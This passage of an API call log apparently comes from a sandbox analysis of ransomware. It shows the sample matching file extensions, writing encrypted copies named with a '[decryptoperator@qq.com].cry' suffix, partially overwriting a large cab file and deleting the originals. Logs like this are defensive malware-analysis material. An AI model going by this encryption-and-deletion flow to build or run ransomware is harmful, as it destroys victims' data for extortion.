(lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.817] lstrlenW (lpString=".1cd") returned 4 [0047.817] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.817] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.817] lstrlenW (lpString=".jpg") returned 4 [0047.817] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.817] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.817] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.817] lstrlenW (lpString=".doc") returned 4 [0047.817] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.817] lstrlenW (lpString=".docx") returned 5 [0047.817] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.817] lstrlenW (lpString=".pdf") returned 4 [0047.818] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.818] lstrlenW (lpString=".xls") returned 4 [0047.818] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.818] lstrlenW (lpString=".xlsx") returned 5 [0047.818] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.818] lstrlenW (lpString=".ppt") returned 4 [0047.818] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.818] lstrlenW (lpString=".zip") returned 4 [0047.818] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.818] lstrlenW (lpString=".rar") returned 4 [0047.818] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.818] lstrlenW (lpString=".bz2") returned 4 [0047.818] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.818] lstrlenW (lpString=".7z") returned 3 [0047.818] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.818] lstrlenW (lpString=".dbf") returned 4 [0047.818] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.818] lstrlenW (lpString=".1cd") returned 4 [0047.818] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.818] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.818] lstrlenW (lpString=".jpg") returned 4 [0047.818] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.819] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0047.819] lstrlenW (lpString="PidGenX.dll") returned 11 [0047.819] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0047.819] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=1463568) returned 1 [0047.819] CloseHandle (hObject=0x1c0) returned 1 [0047.819] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0047.819] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.819] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0047.819] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.819] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.819] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0047.824] GetLastError () returned 0x0 [0047.824] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0047.913] WriteFile (in: hFile=0x224, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0047.930] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x65520, lpOverlapped=0x0) returned 1 [0048.102] WriteFile (in: hFile=0x224, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0048.115] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.115] WriteFile (in: hFile=0x224, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.115] SetEndOfFile (hFile=0x224) returned 1 [0048.115] CloseHandle (hObject=0x224) returned 1 [0048.115] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.115] SetEndOfFile (hFile=0x1c0) returned 1 [0048.119] CloseHandle (hObject=0x1c0) returned 1 [0048.119] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0048.120] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0048.120] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.120] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.120] lstrlenW (lpString=".doc") returned 4 [0048.120] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.120] lstrlenW (lpString=".docx") returned 5 [0048.120] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0048.120] lstrlenW (lpString=".pdf") returned 4 [0048.120] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.120] lstrlenW (lpString=".xls") returned 4 [0048.120] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.120] lstrlenW (lpString=".xlsx") returned 5 [0048.120] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0048.120] lstrlenW (lpString=".ppt") returned 4 [0048.120] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.120] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.120] lstrlenW (lpString=".zip") returned 4 [0048.120] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.120] lstrlenW (lpString=".rar") returned 4 [0048.120] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.120] lstrlenW (lpString=".bz2") returned 4 [0048.120] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.120] lstrlenW (lpString=".7z") returned 3 [0048.120] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.120] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.120] lstrlenW (lpString=".dbf") returned 4 [0048.120] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.120] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.120] lstrlenW (lpString=".1cd") returned 4 [0048.121] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.121] lstrlenW (lpString=".jpg") returned 4 [0048.121] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.121] lstrlenW (lpString=".doc") returned 4 [0048.121] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.121] lstrlenW (lpString=".docx") returned 5 [0048.121] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0048.121] lstrlenW (lpString=".pdf") returned 4 [0048.121] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.121] lstrlenW (lpString=".xls") returned 4 [0048.121] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.121] lstrlenW (lpString=".xlsx") returned 5 [0048.121] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0048.121] lstrlenW (lpString=".ppt") returned 4 [0048.121] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.121] lstrlenW (lpString=".zip") returned 4 [0048.121] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.121] lstrlenW (lpString=".rar") returned 4 [0048.121] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.121] lstrlenW (lpString=".bz2") returned 4 [0048.121] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.121] lstrlenW (lpString=".7z") returned 3 [0048.121] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.121] lstrlenW (lpString=".dbf") returned 4 [0048.121] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.121] lstrlenW (lpString=".1cd") returned 4 [0048.121] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.121] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.121] lstrlenW (lpString=".jpg") returned 4 [0048.121] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.122] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0048.122] lstrlenW (lpString="ProPrWW.cab") returned 11 [0048.122] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0048.139] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=177720283) returned 1 [0048.139] CloseHandle (hObject=0x1c0) returned 1 [0048.139] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab")) returned 0x2020 [0048.139] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.139] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0048.139] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0048.140] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.140] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.140] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.464] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.464] ReadFile (in: hFile=0x1c0, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.526] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.526] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.526] ReadFile (in: hFile=0x1c0, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.670] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.670] WriteFile (in: hFile=0x1c0, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0048.686] SetEndOfFile (hFile=0x1c0) returned 1 [0048.686] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x43b0048 [0048.686] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.686] WriteFile (in: hFile=0x1c0, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.687] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.687] WriteFile (in: hFile=0x1c0, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.687] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.687] WriteFile (in: hFile=0x1c0, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.689] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x43b0048 | out: hHeap=0x600000) returned 1 [0048.689] CloseHandle (hObject=0x1c0) returned 1 [0048.689] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0048.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.690] lstrlenW (lpString=".doc") returned 4 [0048.690] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.690] lstrlenW (lpString=".docx") returned 5 [0048.690] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.690] lstrlenW (lpString=".pdf") returned 4 [0048.690] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.690] lstrlenW (lpString=".xls") returned 4 [0048.690] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.690] lstrlenW (lpString=".xlsx") returned 5 [0048.690] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.690] lstrlenW (lpString=".ppt") returned 4 [0048.690] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.690] lstrlenW (lpString=".zip") returned 4 [0048.690] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.690] lstrlenW (lpString=".rar") returned 4 [0048.690] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.690] lstrlenW (lpString=".bz2") returned 4 [0048.690] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.690] lstrlenW (lpString=".7z") returned 3 [0048.690] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.690] lstrlenW (lpString=".dbf") returned 4 [0048.690] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.690] lstrlenW (lpString=".1cd") returned 4 [0048.690] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.690] lstrlenW (lpString=".jpg") returned 4 [0048.691] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.691] lstrlenW (lpString=".doc") returned 4 [0048.691] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.691] lstrlenW (lpString=".docx") returned 5 [0048.691] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.691] lstrlenW (lpString=".pdf") returned 4 [0048.691] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.691] lstrlenW (lpString=".xls") returned 4 [0048.691] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.691] lstrlenW (lpString=".xlsx") returned 5 [0048.691] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.691] lstrlenW (lpString=".ppt") returned 4 [0048.691] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.691] lstrlenW (lpString=".zip") returned 4 [0048.691] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.691] lstrlenW (lpString=".rar") returned 4 [0048.691] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.691] lstrlenW (lpString=".bz2") returned 4 [0048.691] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.691] lstrlenW (lpString=".7z") returned 3 [0048.691] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.691] lstrlenW (lpString=".dbf") returned 4 [0048.691] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.691] lstrlenW (lpString=".1cd") returned 4 [0048.691] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.691] lstrlenW (lpString=".jpg") returned 4 [0048.691] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.692] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0048.692] lstrlenW (lpString="ose.exe") returned 7 [0048.692] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0048.692] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=174440) returned 1 [0048.692] CloseHandle (hObject=0x1c0) returned 1 [0048.692] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0048.692] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.692] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0048.692] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.692] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.692] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0048.693] GetLastError () returned 0x0 [0048.693] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x2a968, lpOverlapped=0x0) returned 1 [0048.755] WriteFile (in: hFile=0x16c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0048.759] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.760] WriteFile (in: hFile=0x16c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, 